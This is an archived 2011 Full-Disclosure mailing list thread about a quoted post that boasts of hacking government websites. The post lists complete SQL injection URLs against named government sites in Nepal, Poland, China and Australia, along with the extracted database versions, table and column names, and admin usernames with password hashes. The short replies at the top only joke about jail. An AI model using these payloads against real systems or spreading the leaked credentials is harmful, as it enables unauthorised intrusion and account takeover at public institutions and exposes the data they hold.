[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BANLkTik3uXOLB9qbz2zwvyML_fC5K8CWxA@mail.gmail.com>
Date: Fri, 20 May 2011 09:13:59 +0100
From: Cal Leeming <cal@...whisper.co.uk>
To: tc <toughcrowd@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Governments Websites Pwned !!
Kinda. But I passed the "man up and put your daughter first" class.. handed
myself in and admitted to everything for a fresh start. Worth every second
of jail tbh.
On 19 May 2011 04:02, "tc" <toughcrowd@...il.com> wrote:
> Didn't you already fael that class Cal?
>
> On Wed, May 18, 2011 at 6:03 PM, Cal Leeming <cal@...whisper.co.uk> wrote:
>> Welcome to 101 of "stay out of jail".. Todays topic is: How not to piss
off
>> the govt.
>> :|
>>
>> On Wed, May 18, 2011 at 8:54 AM, aryan hacky <aryan.hacky@...il.com>
wrote:
>>>
>>> _ _ _ ___ _ _
>>> / \ _ __ | |_(_) |_ _|_ __ | |_ _ __ _ _ __| | ___ _ __ ___
>>>
>>> / _ \ | '_ \| __| |_____| || '_ \| __| '__| | | |/ _` |/ _ \ '__/ __|
>>>
>>> / ___ \| | | | |_| |_____| || | | | |_| | | |_| | (_| | __/ | \__ \
>>> /_/ \_\_| |_|\__|_| |___|_| |_|\__|_| \__,_|\__,_|\___|_| |___/
>>>
>>> .com
>>>
>>>
>>>
>>> Lolzz following GOV sites SQL Injection is working from last years . why
>>> they don't like to patch it !!
>>> Preety layz people are in goverment sectors like there layz jobs .
>>> Many newbies are learning SQL injection from the Gov. sites :p lolz .. I
>>> think it is time to weak up ..
>>>
>>>
>>>
>>> Here All MySQL Version 5 And Version 4 Websites are injected !
>>>
>>> Special Thanks to Silic0n ....
>>>
>>> Work Done By @r@.....
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,database%28%29,3,4,5,6,7,8,9,10,11,12,13--
>>>
>>>
>>>
>>> DB:eproc_seznepal_gov_np
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>> TAble:
>>> tbl_acknowledgement,
>>> tbl_addenda,
>>> tbl_admin_info,
>>> tbl_adminlogin,
>>> tbl_agency,
>>> tbl_agency_category,
>>> tbl_announcement,
>>> tbl_archive_auction,
>>> tbl_archive_tender,
>>> tbl_award,tbl_award1,
>>>
>>> tbl_bid,tbl_bid_document,
>>>
>>> tbl_bid_document_additional,
>>> tbl_bid_modification,
>>> tbl_clarification,
>>> tbl_company_category,
>>> tbl_contract,tbl_customer,
>>> tbl_faq,tbl_information,
>>> tbl_info
>>> ---------------------------------------------------------------
>>>
>>>
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name,0x3a,column_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> columns:
>>>
>>> acknowledgementid,
>>> provider_id,
>>> agency_id,
>>> project_id,
>>> project_type,
>>> project_name,
>>> activity,
>>> date,
>>> time,ip,
>>> addendaid,
>>> noticeid,
>>> date,
>>> newspaper,
>>> description,
>>>
>>>
>>> filename,
>>> filetype,
>>> filesize,
>>> document,
>>> admin_id,
>>> firstname,
>>> lastname,
>>> email_addr,
>>> secret_question,
>>> answer,
>>> admin_id,
>>> user_name,
>>> pass_word,
>>> user_level,
>>> agency_id,
>>> organization_name,
>>>
>>>
>>> organization_reg_num,
>>> vat_num
>>>
>>> table
>>>
>>> tbl_acknowledgement:acknowledgementid,
>>> tbl_acknowledgement:provider_id,
>>> tbl_acknowledgement:agency_id,
>>> tbl_acknowledgement:project_id,
>>> tbl_acknowledgement:project_type,
>>>
>>>
>>> tbl_acknowledgement:project_name,
>>> tbl_acknowledgement:activity,
>>> tbl_acknowledgement:date,
>>> tbl_acknowledgement:time,
>>> tbl_acknowledgement:ip,
>>> tbl_addenda:addendaid,
>>> tbl_addenda:noticeid
>>>
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat(admin_id,0x3a,user_name,0x3a,pass_word),3,4,5,6,7,8,9,10,11,12,13
>>> from tbl_adminlogin--
>>>
>>>
>>>
>>> ARMIN: 1:sez:7a4489303e667e03b6414997b53aa003
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,database%28%29--
>>>
>>>
>>> DB:national_nm
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> table:admin,events,news
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> col:
>>> id,
>>> username,
>>> password,
>>> events_id,
>>> date,
>>> events_title,
>>> events_short_desc,
>>> events_full_desc,
>>> enabled,
>>> id,date,
>>> news_title,
>>> news_short_desc,
>>> author,
>>> news_full_desc,enabled
>>>
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28username,0x3a,password%29%20from%20admin--
>>>
>>>
>>>
>>> admin pass:admin:*4F7F6D6AF7CD8CD89967918F893DA545DDA85623
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
>>>
http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,@@version,3,4,5,6%20--
>>>
>>>
>>>
>>> version:5.0.51a-24+lenny5-log
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,group_concat%28table_name%29,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> table:
>>> EURES_cbm,
>>> EURES_cbm_kwartaly,
>>> EURES_cv,
>>> EURES_cv_doswiadczenie_zawodowe,
>>> EURES_cv_jezyki_obce,
>>> EURES_cv_kategorie_prawojazdy,
>>> EURES_cv_komputer,
>>> EURES_cv_panstwa,
>>> EURES_cv_rzemieslnicze,
>>>
>>>
>>> EURES_cv_urzedowe_jezyki,
>>> EURES_cv_wyuczone,
>>> EURES_cv_zawody_doswiadczenie,
>>> EURES_cv_zawody_rzemieslnicze,
>>> EURES_cv_zawody_wyuczone,
>>> EURES_forum,EURES_forum_posty,
>>> EURES_forum_tematy,
>>> EURES_log,
>>> abc,autoryzacja,
>>>
>>>
>>> cms_EURES_cbm,
>>> cms_EURES_cbm_kwartaly,
>>> cms_EURES_cbm_new,
>>> cms_EURES_forum,
>>> cms_EURES_forum_posty,
>>> cms_EURES_forum_tematy,
>>> cms_EURES_log,cms_articles,
>>> cms_artlang,cms_attachments,
>>> cms_category,cms_categorytemplates,
>>>
>>>
>>> cms_catlang,cms_cbm_admin,
>>> cms_form_answers,cms_forms,
>>> cms_groups,cms_language_strings,
>>> cms_languages,cms_mailgroups,
>>> cms_mailing,cms_news,
>>> cms_news_data,
>>> cms_privs,
>>> cms_rejestr_dane_oferty_kraj,
>>>
>>> cms_rejestr_isco4,
>>>
>>> cms_rejestr_isco6,
>>> cms_rejestr_kody_isco,
>>> cms_rejestr_kraje,
>>> cms_rejestr_oferty_polska,
>>> cms_rejestr_oferty_zagranica,
>>> cms_rejestr_pracodawcy,
>>> cms_rejestr_wojewodztwa,
>>> cms_rejestr_wup,
>>> cms_template,
>>>
>>>
>>> cms_template_data,
>>> cms_template_fields,
>>> cms
>>>
>>>
>>>
http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,group_concat%28column_name%29,3,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> col:
>>> id,
>>> id_user,
>>> osoba_raportujaca,
>>> osoba_funkcja,
>>> ostatnia_modyfikacja,
>>> kwartal,
>>> doradcow,
>>> asystentow,
>>> szkolen,
>>> szkolen_wup,
>>> szkolen_pup,
>>> szkolen_asystentow,
>>> przeszkolonych_wup,
>>>
>>>
>>> przeszkolonych_wup_1,
>>> przeszkolonych_pup,
>>> przeszkolonych_pup_1,
>>>
>>>
www,wspolpraca,GCI,ABK,OHP,ZZ,AZ,ISZ,OP,ISA,inne_istytucje,kontakty_polscy,kontakty_EOG,dostep_klienci,kontakty_pracodawcy,kontakty_organizacje,kontakty_od_pracodawcow,rekrut_pracodaw_polskich,polskich_1_stanow,polskich_wielo_stanow,podan_rekrut_pracod_polskich,zatrud_rekrut_pracod_polskich,rekrut_pracod_EOG,EOG_1_stanow,EOG_wielo_stanow,podan_rekrut_pracod_EOG,bezrob_poszuk_rekrut_EOG,ofert_wpis_rej,ofert_wpis_rej_otw,ofert_wpis_rej_zamk,liczba_wakatow,targow_pracy,targow_pracy_kraj,targow_pracy_poza,video_konferencje,kont_z_bezrob,kont_z_bezrob_indyw,kont_z_bezrob_grup,grup,osob_lacznie,kont_ogolnie,kont_war_zycia,kont_poszukiwanie_pracy,kont_inne,kont_obyw_pols,kont_obyw_EOG,kont_bezr_pol,kont_bezr_EOG,kont_pracod_pol,kont_pracod_EOG,kont_bezr_nt_zycia,dod_info,kont_nt_wspol_trans_kraj,k
>>>
>>>
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://ncclcs.cma.gov.cn/Website/index.php?ChannelID=-107%20Union%20select%201,unhex%28hex%28@@version%29%29,3,4--%20-
>>>
>>>
>>>
>>> 5.0.18
>>>
>>> http://ncclcs.cma.gov.cn/Website/index.php?ChannelID=-107 Union select
>>> 1,unhex(hex(group_concat(table_name))),3,4
>>> from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> table:
>>> _news_content,
>>> admin,
>>> news,
>>> news_content,
>>> news_pic,
>>> system_info,
>>> website_channel,
>>> website_counter,
>>> website_counter_detail,
>>> website_link,
>>> website_setup
>>>
>>> http://ncclcs.cma.gov.cn/Website/index.php?ChannelID=-107 Union select
>>> 1,unhex(hex(group_concat(column_name))),3,4 from
information_schema.columns
>>> where table_schema=database()--
>>>
>>>
>>>
>>> col:
>>>
>>>
NewsID,NewsCat,NewsPCat,NewsChannelCat,NewsAuthor,NewsKeyword,NewsSource,NewsSourceLink,NewsTitle,NewsSubTitle,NewsDesc,NewsPublishTime,IfDisplayTime,NewsContent,NewsPicUrl,PicDesc,NewsAttachUrl,NewsPostTime,NewsState,NewsFocus,NewsCommend,NewsGrant,NewsProtect,ViewTimes,NewsOrder,AdminID,AdminName,NewsID,NewsContent,NewsContentText,AdminID,AdminUser,AdminPassword,TrueName,Level,AdminRole,NewsID,NewsCat,NewsPCat,NewsChannelCat,NewsAuthor,NewsKeyword,NewsSource,NewsSourceLink,NewsTitle,NewsSubTitle,NewsDesc,NewsPublishTime,IfDisplayTime,NewsContent,NewsPicUrl,PicDesc,NewsAttachUrl,NewsPostTime,NewsState,NewsFocus,NewsCommend,NewsGrant,NewsProtect,ViewTimes,NewsOrder,AdminID,AdminName,NewsID,NewsContent,NewsContentText,PicID,NewsID,PicUrl,PicDesc,PicAlign,NewsID,NewsCat,NewsTitle,NewsSubTitle,NewsDesc,NewsContent,NewsPicUrl,PicDesc,NewsAttachUrl,PageLeft,ChannelID,ChannelParentID,Serial,ChannelName,AccessAccount,AccessPassword,ChannelDescription,NewsChannel,ChannelLink,ChannelState,ChannelType,ChannelOrder,Disp
>>>
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>> http://www.uzs.gov.pl/bip/index.php?pg=nt&fidx=302&nidx=266 and 1=2
union
>>> select%201,2,3,4,5 ,6,@@version,8,9,10,11,12,13,14%20--&print=1
>>>
>>>
>>>
>>> 4.1.14-standard-log
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.cgcc.gov.cn/news_view.php?id=-403%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21,22,23
>>>
>>>
>>>
>>> 4.1.22-log
>>>
>>> Getting fucking bored with this JOB. Use your brain.exe
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.hdzj.gov.cn/news1.php?id=363+and+1=2+union+select+1,@@version,3,4,5,6,7
>>>
>>>
>>>
>>> 4.0.16-nt
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat%28uid,0x3a,pwd%29+from+administrator
>>>
>>>
>>>
>>>
>>>
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat(table_name)
>>> from information_schema.tables where table_schema=database()--
>>>
>>>
>>>
>>>
>>>
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> admin pass:xsq:920e1c96db4b09a5a9aad48e9780c620
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://shanxi.cecs.gov.cn/lanmu.php?f_lanmu_id=-4%20UNION%20SELECT%201,2,3,group_concat%28pwd,0x3a,qyname%29,5,6,7,8,9,10,11,12,13,14,15%20from%20chinaeci_new2011.users--
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
http://www.shootingcentre.nsw.gov.au/article.php?id=-9%20union+all+select+1,2,3,@@version,5,6,7,8,9,10,12,13,14,15,16,17
>>>
>>>
>>>
>>> version: 4.1.22-standard
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists